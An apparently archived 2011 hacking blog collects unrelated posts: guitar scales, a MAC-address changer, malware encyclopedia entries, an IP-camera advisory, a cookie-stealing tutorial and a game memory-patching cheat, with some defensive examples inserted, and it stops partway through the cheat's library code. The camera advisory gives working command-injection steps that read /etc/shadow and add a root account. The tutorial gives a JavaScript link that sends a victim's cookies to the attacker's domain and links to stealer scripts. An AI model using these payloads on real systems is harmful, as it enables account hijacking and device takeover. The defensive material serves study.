
31 October 2011

5 Scales Every Beginner Guitarist Must Master

To give the blog a bit of variety, instead of it being nothing but coding and hacking :D
(so pretentious of me, just so I get called a hacker :p)

Here are some scales that a beginner guitarist must master. Nobody actually makes them mandatory,
but to improvise well in a song, a guitarist does need the following scales:

1. Major Scale
This is the most common and the most basic one. The major scale here
is the diatonic minor.

2. Minor Scale
The minor scale is really needed in a song. Guitarists usually bring in the harmonic or melodic minor,
so that the beauty of a song shows more clearly, or in cooler terms, "the feel really hits"
(there I go again acting like a guitarist hahahha :p)

3. Blues Scale
The blues scale could be called the soul of guitar playing. Rock guitarists like to bring this scale into their songs,
and even jazz uses blues in it.

4. Major Pentatonic and 5. Minor Pentatonic
Pentatonics are also often used when improvising; both the major and the minor pentatonic are used frequently. One thing to watch: guitarists sometimes take the minor pentatonic to be the blues scale, because the two really do sound very similar, differing by just one note. So be careful not to confuse them.

These 5 scales can be called the most essential, because most guitarists use them.
Even so, learning other scales is even better for widening the dynamics of our music.
Also don't forget to listen a lot and hang out with other guitarists :)

The following are some terms that can make learning our basic music theory easier,
among them:

  • Blues: a scale that has 6 notes per octave; this scale has a minor character.
  • Chord: a combination of 2 or more notes sounded together.
  • Diatonic: a scale that has 7 notes per octave. This is the most basic and most commonly used scale.
  • Interval: the distance from one note to another within one octave.
  • Chromatic, or accidental: a note lying 1/2 step from its original note, raised (#/sharp) or lowered (b/flat).
  • Major: a type of interval that can be thought of as "bright" or "happy".
  • Minor: a type of interval/scale that can be thought of as "sad".

24 October 2011

FuCkMAC v.0.1

#!/usr/bin/env python3
#
######################################################
# FuCkMAC.py is a script to change the MAC address
# on *nix using the 'ifconfig' tool.
#
# D4wFl1N[at]deadc0de[dot]or[dot]id
######################################################
#

import sys
import os
import re
import socket
import fcntl
import struct
import array
import getopt
import platform
import subprocess

# six colon-separated hex octets, e.g. 00:11:22:33:44:55
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}")

# print banner
def Banner():
    print("""
#######################################
## FuCkMAC v0.1                      ##
## D4wFl1N[at]deadc0de[dot]or[dot]id ##
#######################################
""")

# check os
def CheckOS():
    if platform.system() != 'Linux':
        print("[-] Warning: you are not using Linux")

# check whether the user is root
def CheckRoot():
    # the effective UID decides whether ifconfig may change the device
    if os.geteuid() != 0:
        Banner()
        print("[-] You have to be root")
        sys.exit(1)

# set the mac address
def SetMAC(device, mac):
    # argument lists, no shell: device and mac are never parsed as shell syntax
    subprocess.check_call(["ifconfig", device, "down"])
    try:
        subprocess.check_call(["ifconfig", device, "hw", "ether", mac])
    finally:
        # bring the interface back up even if the change was rejected
        subprocess.check_call(["ifconfig", device, "up"])

# get names of all "up" network interfaces
def GetInterfaces():
    max_possible = 128  # arbitrary. raise if needed.
    # struct ifreq is 40 bytes on 64-bit Linux and 32 bytes on 32-bit Linux
    ifreq_size = 40 if struct.calcsize('P') == 8 else 32
    nbytes = max_possible * ifreq_size
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    names = array.array('B', b'\0' * nbytes)
    try:
        outbytes = struct.unpack('iL', fcntl.ioctl(
            s.fileno(),
            0x8912,  # SIOCGIFCONF
            struct.pack('iL', nbytes, names.buffer_info()[0])
        ))[0]
    finally:
        s.close()
    namestr = names.tobytes()
    # the interface name is the first 16 bytes (IFNAMSIZ) of each record
    return [namestr[i:i+16].split(b'\0', 1)[0].decode()
            for i in range(0, outbytes, ifreq_size)]

# Usage
def Usage():
    Banner()
    print("""%s\n
-h\t\t: print this message
-l\t\t: list up interfaces
-i <interface>\t: select interface
-a <address>\t: change MAC address
""" % (sys.argv[0]))

######################################
################ MAIN ################
######################################

CheckOS()
CheckRoot()

if len(sys.argv) < 2:
    Usage()
    sys.exit(0)

try:
    opts, args = getopt.getopt(sys.argv[1:], "la:i:h")
except getopt.GetoptError as err:
    print(str(err))
    sys.exit(2)

interfaces = GetInterfaces()

Address = ""
Interface = ""

for o, a in opts:
    if o == "-h":
        Usage()
        sys.exit(0)
    elif o == "-l":
        print("Available interfaces :")
        for device_name in interfaces:
            print(device_name)
        sys.exit(0)
    elif o == "-i":
        Interface = a
        if Interface not in interfaces:
            print("[-]", Interface, "is an invalid interface.")
            sys.exit(1)
        print("[*] Interface:", Interface)
    elif o == "-a":
        Address = a
        # check the format, not only the length
        if not MAC_RE.fullmatch(Address):
            print('[-] "%s" is an invalid MAC address.' % Address)
            sys.exit(1)
        print("[*] FuCk MACaddr:", Address)
    else:
        assert False, "unhandled option"

if len(Address) < 1:
    print("[-] You have to enter the fuCk MAC address try '%s -h' for help" % (sys.argv[0]))
    sys.exit(1)
elif len(Interface) < 1:
    print("[-] You have to enter the interface name try '%s -h' for help" % (sys.argv[0]))
    sys.exit(1)

try:
    SetMAC(Interface, Address)
except (OSError, subprocess.CalledProcessError) as err:
    print("[-] ifconfig failed:", err)
    sys.exit(1)

print("[*] Done")

16 October 2011

Sucuri WordPress check - v1.0 <= TimThumb script file checker


13 October 2011

Backdoor:Win32/Smadow.gen!B

Aliases :
Backdoor:Win32/Smadow.gen!B is also known as Backdoor.Maxplus.13 (Dr.Web), Maxplus (other).
Explanation :
Backdoor:Win32/Smadow.gen!B is a generic detection for malware that can perform different actions, such as executing other malware. The executed malware may be detected as TrojanDropper:Win32/Sirefef.B or Trojan:Win32/Sirefef.




Installation
Some variants of this malware may be present in the Application Data directory:

%APPDATA%\.exe
The registry is modified to run the trojan at each Windows start.

In subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Sets value: "AD Network"
With data: "%APPDATA%\.exe"

In the wild, we have observed some variants of Backdoor:Win32/Smadow.gen!B present with other malware including TrojanDropper:Win32/Sirefef.B or Trojan:Win32/Sirefef. Some variants of this malware attempt to connect with the following IP addresses to download arbitrary files:

    * 69.50.212.158
    * 193.105.154.218





Analysis by Patrik Vicol

Backdoor:Win32/R2d2.A

Aliases :
Backdoor:Win32/R2d2.A is also known as Win-Trojan/R2d2.360448 (AhnLab), W32/R2D2.A (Command), Win32/R2D2.A (ESET), Backdoor.Win32.R2D2.a (Kaspersky), Troj/BckR2D2-A (Sophos), Backdoor.R2D2 (Symantec).
Explanation :
Backdoor:Win32/R2d2.A is a trojan that communicates with a remote server to listen for commands from an attacker. The trojan monitors Skype communications, captures screen shots and may download and execute arbitrary files.

Installation
This trojan may be installed by another process and may be present in the Windows system folder as the following:

    * %windir%\System32\mfc42ul.dll

The registry is modified to run the malware at each Windows start.

In subkey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Sets value: "AppInit_DLLs"
With data: "%windir%\System32\mfc42ul.dll"

Payload
Installs additional component
Backdoor:Win32/R2d2.A creates the following component, detected as Trojan:Win32/R2d2.A!rootkit:

    * %windir%\System32\winsys32.sys

This component is used by the backdoor to perform the following actions:

    * Delete or rename protected files by modifying registry data
    * Modify other registry data
    * Modify file information properties of files
    * Create or modify files
    * Link to \\Device\KeyboardClassC to capture keystrokes



For more information about Trojan:Win32/R2d2.A!rootkit, see the description elsewhere in the encyclopedia.

Communicates with a remote server
Backdoor:Win32/R2d2.A is only activated for the following set of processes:

    * explorer.exe
    * Skype.exe
    * SkypePM.exe
    * msnmsgr.exe
    * yahoomessenger.exe
    * x-lite.exe
    * sipgatexlite.exe

Backdoor:Win32/R2d2.A connects to a remote server to listen for commands from an attacker. Commands could instruct the trojan to perform the following actions:

    * Monitor incoming and outgoing calls
    * Send collected Skype data, version information and online status to a remote server
    * Download and execute arbitrary files
    * Take desktop screen shots during web browsing with the following applications:
          o firefox.exe
          o iexplore.exe
          o opera.exe
          o navigator.exe
          o seamonkey.exe



Analysis by Jireh Sanico

Trojan:Win32/R2d2.A!rootkit

Aliases :

Trojan:Win32/R2d2.A!rootkit is also known as Win-Trojan/R2d2.5376 (AhnLab), W32/R2D2.A (Command), BackDoor.R2D2.1 (Dr.Web), Win32/R2D2.A (ESET), Backdoor.Win32.R2D2.a (Kaspersky), Troj/BckR2D2-A (Sophos), Backdoor.R2D2 (Symantec), Rootkit.R2D2.B (VirusBuster).
Explanation :
Trojan:Win32/R2d2.A!rootkit is a component of Backdoor:Win32/R2d2.A. It can delete or rename protected files, modify file properties and perform other actions.



Installation

This malware is installed by another process and may be present in the Windows system folder as the following:

    * %windir%\System32\winsys32.sys

The trojan executes as a service named "winsys32".

Payload
Performs file operations on protected files/modifies system data
This malware is used by Backdoor:Win32/R2d2.A to perform the following actions:

    * Delete or rename protected files by modifying registry data in the following subkey:
          o HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperation
    * Modify other registry data
    * Modify file information properties of other files via the Windows kernel-mode driver support routine ZwSetInformationFile
    * Create or modify files
    * Link to \\Device\KeyboardClassC to capture keystrokes



Analysis by Jireh Sanico
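
A triage check for the registry indicators listed in the Backdoor:Win32/Smadow.gen!B, Backdoor:Win32/R2d2.A and Trojan:Win32/R2d2.A!rootkit entries above, as an added example that is not part of the original write-ups. It assumes the input is text saved from `reg query`, and that the "winsys32" service is registered under `HKLM\SYSTEM\CurrentControlSet\Services` as Windows services are; the sample text is constructed.

```python
import re

HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}
# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data
VALUE_RE = re.compile(r"^ {4}(.+?) {4}(REG_[A-Z_]+)(?: {4}(.*))?$")


def norm_key(key):
    """Shorten the hive name and lower-case the key path for comparison."""
    hive, _, rest = key.strip().partition("\\")
    return (HIVES.get(hive.upper(), hive.upper()) + "\\" + rest).lower()


def parse_reg_query(text):
    """Parse `reg query` text into {key: {value_name: data}}, names lower-cased."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.upper().startswith("HKEY_"):
            current = keys.setdefault(norm_key(line), {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(3) or ""
    return keys


# Key paths and value names as given in the entries above.
APPINIT = norm_key(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows")
RUNONCE = norm_key(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce")
# Assumption: standard location of the key for a service named "winsys32".
SERVICE = norm_key(r"HKLM\SYSTEM\CurrentControlSet\Services\winsys32")


def find_indicators(keys):
    """Return (detection name, where, data) tuples for every indicator present."""
    findings = []
    # AppInit_DLLs is a space- or comma-delimited DLL list, so test each entry;
    # %windir% differs per host, so only the tail of the path is compared.
    for dll in re.split(r"[ ,]+", keys.get(APPINIT, {}).get("appinit_dlls", "")):
        if dll.strip('"').lower().endswith(r"\system32\mfc42ul.dll"):
            findings.append(("Backdoor:Win32/R2d2.A", "AppInit_DLLs", dll))
    # The file name in the RunOnce data is not given above, so match the value name.
    data = keys.get(RUNONCE, {}).get("ad network")
    if data is not None:
        findings.append(("Backdoor:Win32/Smadow.gen!B", "RunOnce value 'AD Network'", data))
    if SERVICE in keys:
        findings.append(("Trojan:Win32/R2d2.A!rootkit", "service key winsys32",
                         keys[SERVICE].get("imagepath", "")))
    return findings


# Constructed sample input, not captured from a real host.
SAMPLE_INFECTED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
    AppInit_DLLs    REG_SZ    C:\Windows\System32\mfc42ul.dll,C:\PROGRA~1\Vendor\hook.dll
    LoadAppInit_DLLs    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    AD Network    REG_SZ    C:\Users\alice\AppData\Roaming\sample.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winsys32
    ImagePath    REG_EXPAND_SZ    \??\C:\Windows\System32\winsys32.sys
    Type    REG_DWORD    0x1
"""

SAMPLE_CLEAN = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
    AppInit_DLLs    REG_SZ
    LoadAppInit_DLLs    REG_DWORD    0x0
"""

if __name__ == "__main__":
    for name, where, data in find_indicators(parse_reg_query(SAMPLE_INFECTED)):
        print("%-30s %-28s %s" % (name, where, data))
```

The rootkit component modifies registry data, so a check run on the live system can miss what an offline copy of the hives would show.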

Trojan:Java/SMSer.T

Aliases :

There are no other names known for Trojan:Java/SMSer.T.

Explanation :

Trojan:Java/SMSer.T is a trojan that affects mobile devices with Java Platform, Micro Edition supported using the application name 'CanvasFormMIDlet MIDlet Suite'.



Trojan:Java/SMSer.T arrives as .JAR file installer named 'photo.jar'.

Once installed, it will display the following text in Russian:

"Почти готово..."

"Ссылка на дистрибутив приложения придет в ответном SMS в течение 5 минут. Перейдите по полученной ссылке и скачайте приложение."

Which translates to:

"Almost ready... "

"a reference to the application distribution package will come [via] SMS within 5 minutes. Click on the link provided and download the application."

If the user clicks on the link, the trojan will appear to download a package, when in fact it executes the trojan's payload and initiates the sending of SMS messages to a premium number.

When it runs in the background, it sends SMS messages without the user's consent. The SMS it sends to the Russian premium SMS short code number 3602 contains the string "503448915" which may charge the user without their knowledge.



Analysis by Marianne Mallen

Trojan:Java/Redbrowser.B

Aliases :

There are no other names known for Trojan:Java/Redbrowser.B.

Explanation :


Trojan:Java/RedBrowser.B is a trojan that affects mobile devices with Java Platform, Micro Edition supported, that poses as a mobile-dating application.



Trojan:Java/RedBrowser.B is a trojan that affects mobile devices with Java Platform, Micro Edition supported, that poses as a legitimate application.

Trojan:Java/RedBrowser.B may be downloaded as a standard .JAR file installer with the name 'postcard.jar', posing as a mobile-dating application.

When it runs in the background, it sends SMS messages without the user's consent, causing the infected user to incur high SMS charges. The SMS number and message are parsed from a file named 'ico.ico' that is bundled with the trojan; this file is a text file masquerading as an icon file.



Analysis by Marianne Mallen

ABUS TVIP 11550/21550 File Read / File Upload / Command Exec

Title  : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Author : Marco van Berkum

- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command execution (input validation bug)
- How it's totally compromised including ssh root login.

- Summary

The ABUS 11550 and 21550 are IP webcams that can be configured via a web interface. While experimenting, multiple vulnerabilities were discovered that give root access to the operating system, Debian Linux, of the camera. The webserver of the camera is BOA and runs as root.

Although these vulnerabilities can ONLY be exploited when logged in as admin, they can still be considered critical since the camera can be used to gain access to the network behind it. I did not find a way past the login screen without proper credentials (yet).

- Arbitrary file read

When logged in as admin it's possible to read any file on the filesystem since the webserver is running as root.

http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow

- Arbitrary file upload

Similar to the fileread CGI there is also a filewrite CGI that can (over)write any file.

http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE

- Arbitrary command execution (input validation bug)

The camera has several HTML forms to configure services such as an FTP client and an SMTP client. These are used to notify users and upload videos when the camera's motion detection detects movement. These HTML forms can be used to execute arbitrary commands as root. I've found bugs in the SMTP and FTP forms but probably other forms will contain the same bug (unchecked).

Exploit:
In the configuration -> smtp general part is a webform where an administrator's email address can be filled out (Administrator e-Mail address). The form lacks checking for metacharacters such as ;, | and `. When a test email is sent from this form the webinterface executes ssmtp -t . So it is possible to 'break' the commandline by using `ls` for instance. After submitting the command via the 'testbutton' this will be the output:

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Which means we are situated in a directory that contains a backup directory.

`pwd` also works

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Unfortunately this only outputs the first line of the commandline output. But, we can work around this :)

The system also contains a System Log function that shows output of the systemlog. Now, if we want a little more output than just the first line, for instance "ls /" we can do it by filling out `ls /|logger` which sends the output to the system logfile. Which can then be viewed from the webinterface.

Oct  8 14:35:15  root: bin
Oct  8 14:35:15  root: dev
Oct  8 14:35:15  root: etc
Oct  8 14:35:15  root: include
Oct  8 14:35:15  root: init
Oct  8 14:35:15  root: lib
Oct  8 14:35:15  root: linuxrc
Oct  8 14:35:15  root: mnt
Oct  8 14:35:15  root: opt
Oct  8 14:35:15  root: proc
Oct  8 14:35:15  root: root
Oct  8 14:35:15  root: sbin
Oct  8 14:35:15  root: smtp_test.sh
Oct  8 14:35:15  root: sys
Oct  8 14:35:15  root: tag_replace.sh
Oct  8 14:35:15  root: tmp
Oct  8 14:35:15  root: usr
Oct  8 14:35:15  root: var
Oct  8 14:35:15  root: web

Getting the correct commandline output can also be obtained by redirecting it to a readable file on the webserver itself by doing `ls -alR />/web/html/lsoutput.txt`
It can then be accessed by the url http://ipcamera/lsoutput.txt

- How it's totally compromised including ssh root login.

I did it in a few steps. First did a `ls -alR/>/web/html/lsoutput.txt` to see what was on the filesystem and noticed that dropbear is available on the system. Dropbear is an SSH server/client :)
So, I started it with the `/etc/dropbear/dropbear` command.

Then I took a look at the /etc/shadow file and noticed that user root had no password, so ssh'ing in was not an option, yet. So had to create a user, did it the following way:

`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`
and
`echo "test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`

So, now we can login as user test with password test. User test has UID 0, thus root.

test@ipcamera's password:
Welcome to

_____    __      ___       __     ___       _     _    _
|  ___|  /      / __     /     |  _     /       / /
| |___  / /   | /__   / /   | |  |  / /     V /
|  ___|| |__| | |  _   / | |__| | | | | | | |__| |    /
| |    |  __  | | |    |  __  | | |_/ / |  __  |   | |
|_|    |_|  |_| |_|   \_|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.GM.com/



BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

[test]#

Voila ;)

Also, it's possible to mount a samba or NFS share via the webinterface and copy files that way.

Just my two cents
Marco van berkum
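
The input-validation fix for the SMTP test form described in the advisory above, as an added example that is not code from the advisory or from the camera firmware. It assumes the firmware places the form field on the `ssmtp -t` command line; the function names and the sender address are hypothetical.

```python
import re
import subprocess

# Conservative allowlist for a mailbox address: no whitespace, quotes or shell syntax.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
# Characters a shell treats as syntax; used only to explain a rejection.
SHELL_META = set(";|`$&<>(){}[]*?!\\\"'\n\r \t")


def vulnerable_command(admin_email):
    """The pattern the advisory describes: the form field is pasted into a
    command string that a shell then parses. The string is only built here."""
    return "ssmtp -t " + admin_email


def shell_metachars(value):
    """Characters in value that a shell would interpret, for the audit log."""
    return sorted(set(value) & SHELL_META)


def validate_admin_email(value):
    """Return the address unchanged, or raise ValueError."""
    # fullmatch, not match with '$': '$' also matches before a trailing newline,
    # which would let a value add header lines to the message built below.
    if len(value) > 254 or not ADDR_RE.fullmatch(value):
        raise ValueError("rejected address, metacharacters found: %r"
                         % shell_metachars(value))
    return value


def build_test_mail(admin_email, sender="camera@example.invalid"):
    """Return (argv, message). With -t, ssmtp takes the recipient from the
    To: header, so the argv is fixed and carries no user data at all."""
    addr = validate_admin_email(admin_email)
    argv = ["ssmtp", "-t"]
    message = ("From: %s\nTo: %s\nSubject: SMTP test\n\nSMTP test message.\n"
               % (sender, addr))
    return argv, message


def send_test_mail(admin_email):
    """Run the test. A list argv without shell=True never reaches a shell."""
    argv, message = build_test_mail(admin_email)
    return subprocess.run(argv, input=message.encode(), timeout=30).returncode


if __name__ == "__main__":
    # Constructed inputs: one valid address and the values quoted in the advisory.
    for value in ["admin@example.org", "`ls`", "`ls /|logger`"]:
        try:
            print("accepted:", build_test_mail(value)[0])
        except ValueError as err:
            print("rejected %r -> %s" % (value, err))
```

Validation limits what a bad field can do; the advisory's wider finding, a webserver running as root, still makes any remaining bug a root compromise.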

12 October 2011

Cookies Stealing By PakH3X0r

TUT OF Cookies Stealing By PakH3X0r
Note: Dnt use this on any innocent ppls and Pakistani and i m not responsible for any illegal use

Wt r cookies?
Cookies r basically strings by which a website remember you your PC ect.
When u login to any web then web server will make some cookies And web server will remember u by your cookies

Wt is cookies stealing?
Cookies stealing is a way by which u can hack any account with out knowing user name and password u hv 2 send a link to your victim when he click your link he will get a  image or PHP script and this script will give u access to his account until victim get logout but in the case of yahoo cookies will deleted after 24 hours and u need to just refresh the page to get new cookies for you interesting

Hw we can steal cookies?
i knw 2 ways to steal cookies most ppls ask me ab8 this method but today i m giving u many use full scripts by these script u can hack ppls download scripts from here
http://tinyurl.com/cookies-stealing
this zip file include IP stealer  script one facebook cookies stealing script one cookies stealing script and most important yahoo cookies stealer script



1st of all i will tell u ab8 yahoo cookies stealing u will get an rar file in that file you will get 5 more files upload  them on some free hosting sites then create a directory with the name cookies and send this java script to ur victim javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));


ok download another script from here  tut is  also in it hope u will enjoy
http://tinyurl.com/5vbukmw
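
The server-side defence against the `document.cookie` read that the post above relies on, as an added example that is not part of the original post: issue the session cookie with HttpOnly, Secure and SameSite, and audit existing `Set-Cookie` headers for the missing flags. The cookie names and values are constructed, and `document_cookie_view` is a simplified model of what page script can read, not browser code.

```python
from http.cookies import SimpleCookie


def issue_session_cookie(session_id):
    """Build the Set-Cookie value for a session cookie that page script cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["path"] = "/"
    cookie["session"]["httponly"] = True   # withheld from document.cookie
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"  # not attached to cross-site subrequests
    return cookie["session"].OutputString()


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def document_cookie_view(set_cookie_headers):
    """Model of the string page script gets from document.cookie:
    every cookie except those flagged HttpOnly."""
    visible = []
    for header in set_cookie_headers:
        name, value, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            visible.append("%s=%s" % (name, value))
    return "; ".join(visible)


def audit(header):
    """Return (cookie name, list of protective attributes that are missing)."""
    name, _, attrs = parse_set_cookie(header)
    missing = [flag for flag in ("httponly", "secure", "samesite") if flag not in attrs]
    return name, missing


# Constructed response headers: a weak configuration and the corrected one.
WEAK = ["session=3f9c2a; Path=/", "theme=dark; Path=/"]
HARDENED = [issue_session_cookie("3f9c2a"), "theme=dark; Path=/"]

if __name__ == "__main__":
    for label, headers in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, "-> script can read:", repr(document_cookie_view(headers)))
        for header in headers:
            print("   ", audit(header))
```

HttpOnly only withholds the cookie from script; the injected script itself still has to be prevented by output encoding and a content security policy.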

League of Legends Zoom Hack Auto IT Script

;; author: mawize
;; version: 0.10
;; last update: October 11


;; the magic address ;)
;; you can find the magic address easily by following the steps in this video
;; http://www.youtube.com/watch?v=KUJsOUn9E9A
$ADRESSE = 0x00AAF21C ;; Patch 1.0.0.126 (Oct 10 2011/16:16:12)

;; Hotkeys
;; you can find the HexCodes for all Keys here
;; http://www.autoit.de/dokumentation_aktuell/libfunctions/_IsPressed.htm
$KEY_ZOOMIN = "6D" ; NUMPADSUB
$KEY_ZOOMOUT = "6B" ; NUMPADADD

;; zoom step
;; you can play around with this but i think 100 was pretty good
$ZOOMSTEP = 100

;; this probably wont change ;)
$PNAME = "League of Legends.exe"

;#include <NomadMemory.au3>
#include <Misc.au3> ; provides _IsPressed()
$currentZoom = 2250;
$previousZoom = 2250;

While 1
    sleep(10)

    $handle = _MemoryOpen(ProcessExists($PNAME))
    If(_IsPressed($KEY_ZOOMIN)) Then
        $currentZoom = _MemoryRead($ADRESSE,$handle, "float") - $ZOOMSTEP
    ElseIf(_IsPressed($KEY_ZOOMOUT)) Then
        $currentZoom = _MemoryRead($ADRESSE,$handle, "float") + $ZOOMSTEP
    EndIf
   
    If($currentZoom <> $previousZoom AND ProcessExists($PNAME)) Then
        _MemoryWrite($ADRESSE,$handle,$currentZoom, "float")
        $previousZoom = $currentZoom;
    EndIf
    _MemoryClose($handle) ; close the handle array from _MemoryOpen(); passing a PID fails and leaks a handle on every pass
WEnd


;=========================================================
;==================== Start NomadMemory.au3 =====================
;=========================================================

#include-once
#region _Memory
;=========================================================
; AutoIt Version:    3.1.127 (beta)
; Language:            English
; Platform:            All Windows
; Author:            Nomad
; Requirements:        These functions will only work with beta.
;=========================================================
; Credits:    wOuter - These functions are based on his original _Mem() functions.
;            But they are easier to comprehend and more reliable.  These
;            functions are in no way a direct copy of his functions.  His
;            functions only provided a foundation from which these evolved.
;=========================================================
;
; Functions:
;
;=========================================================
; Function:            _MemoryOpen($iv_Pid[, $iv_DesiredAccess[, $iv_InheritHandle]])
; Description:        Opens a process and enables all possible access rights to the
;                    process.  The Process ID of the process is used to specify which
;                    process to open.  You must call this function before calling
;                    _MemoryClose(), _MemoryRead(), or _MemoryWrite().
; Parameter(s):        $iv_Pid - The Process ID of the program you want to open.
;                    $iv_DesiredAccess - (optional) Set to 0x1F0FFF by default, which
;                                        enables all possible access rights to the
;                                        process specified by the Process ID.
;                    $iv_InheritHandle - (optional) If this value is TRUE, all processes
;                                        created by this process will inherit the access
;                                        handle.  Set to 1 (TRUE) by default.  Set to 0
;                                        if you want it FALSE.
; Requirement(s):    None.
; Return Value(s):     On Success - Returns an array containing the Dll handle and an
;                                 open handle to the specified process.
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                             1 = Invalid $iv_Pid.
;                             2 = Failed to open Kernel32.dll.
;                             3 = Failed to open the specified process.
; Author(s):        Nomad
; Note(s):
;========================================================
Func _MemoryOpen($iv_Pid, $iv_DesiredAccess = 0x1F0FFF, $iv_InheritHandle = 1)
   
    If Not ProcessExists($iv_Pid) Then
        SetError(1)
        Return 0
    EndIf
   
    Local $ah_Handle[2] = [DllOpen('kernel32.dll')]
   
    If @Error Then
        SetError(2)
        Return 0
    EndIf
   
    Local $av_OpenProcess = DllCall($ah_Handle[0], 'int', 'OpenProcess', 'int', $iv_DesiredAccess, 'int', $iv_InheritHandle, 'int', $iv_Pid)
   
    If @Error Then
        DllClose($ah_Handle[0])
        SetError(3)
        Return 0
    EndIf
   
    $ah_Handle[1] = $av_OpenProcess[0]
   
    Return $ah_Handle
   
EndFunc

;=========================================================
; Function:            _MemoryRead($iv_Address, $ah_Handle[, $sv_Type])
; Description:        Reads the value located in the memory address specified.
; Parameter(s):        $iv_Address - The memory address you want to read from. It must
;                                  be in hex format (0x00000000).
;                    $ah_Handle - An array containing the Dll handle and the handle
;                                 of the open process as returned by _MemoryOpen().
;                    $sv_Type - (optional) The "Type" of value you intend to read.
;                                This is set to 'dword'(32bit(4byte) signed integer)
;                                by default.  See the help file for DllStructCreate
;                                for all types.  An example: If you want to read a
;                                word that is 15 characters in length, you would use
;                                'char[16]' since a 'char' is 8 bits (1 byte) in size.
; Return Value(s):    On Success - Returns the value located at the specified address.
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                             1 = Invalid $ah_Handle.
;                             2 = $sv_Type was not a string.
;                             3 = $sv_Type is an unknown data type.
;                             4 = Failed to allocate the memory needed for the DllStructure.
;                             5 = Error allocating memory for $sv_Type.
;                             6 = Failed to read from the specified process.
; Author(s):        Nomad
; Note(s):            Values returned are in Decimal format, unless specified as a
;                    'char' type, then they are returned in ASCII format.  Also note
;                    that size ('char[size]') for all 'char' types should be 1
;                    greater than the actual size.
;=========================================================
Func _MemoryRead($iv_Address, $ah_Handle, $sv_Type = 'dword')
   
    If Not IsArray($ah_Handle) Then
        SetError(1)
        Return 0
    EndIf
   
    Local $v_Buffer = DllStructCreate($sv_Type)
   
    If @Error Then
        SetError(@Error + 1)
        Return 0
    EndIf
   
    DllCall($ah_Handle[0], 'int', 'ReadProcessMemory', 'int', $ah_Handle[1], 'int', $iv_Address, 'ptr', DllStructGetPtr($v_Buffer), 'int', DllStructGetSize($v_Buffer), 'int', '')
   
    If Not @Error Then
        Local $v_Value = DllStructGetData($v_Buffer, 1)
        Return $v_Value
    Else
        SetError(6)
        Return 0
    EndIf
   
EndFunc

;==========================================================
; Function:            _MemoryWrite($iv_Address, $ah_Handle, $v_Data[, $sv_Type])
; Description:        Writes data to the specified memory address.
; Parameter(s):        $iv_Address - The memory address which you want to write to.
;                                  It must be in hex format (0x00000000).
;                    $ah_Handle - An array containing the Dll handle and the handle
;                                 of the open process as returned by _MemoryOpen().
;                    $v_Data - The data to be written.
;                    $sv_Type - (optional) The "Type" of value you intend to write.
;                                This is set to 'dword'(32bit(4byte) signed integer)
;                                by default.  See the help file for DllStructCreate
;                                for all types.  An example: If you want to write a
;                                word that is 15 characters in length, you would use
;                                'char[16]' since a 'char' is 8 bits (1 byte) in size.
; Return Value(s):    On Success - Returns 1
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                             1 = Invalid $ah_Handle.
;                             2 = $sv_Type was not a string.
;                             3 = $sv_Type is an unknown data type.
;                             4 = Failed to allocate the memory needed for the DllStructure.
;                             5 = Error allocating memory for $sv_Type.
;                             6 = $v_Data is not in the proper format to be used with the
;                                 "Type" selected for $sv_Type, or it is out of range.
;                             7 = Failed to write to the specified process.
; Author(s):        Nomad
; Note(s):            Values sent must be in Decimal format, unless specified as a
;                    'char' type, then they must be in ASCII format.  Also note
;                    that size ('char[size]') for all 'char' types should be 1
;                    greater than the actual size.
;==========================================================
Func _MemoryWrite($iv_Address, $ah_Handle, $v_Data, $sv_Type = 'dword')
   
    If Not IsArray($ah_Handle) Then
        SetError(1)
        Return 0
    EndIf
   
    Local $v_Buffer = DllStructCreate($sv_Type)
   
    If @Error Then
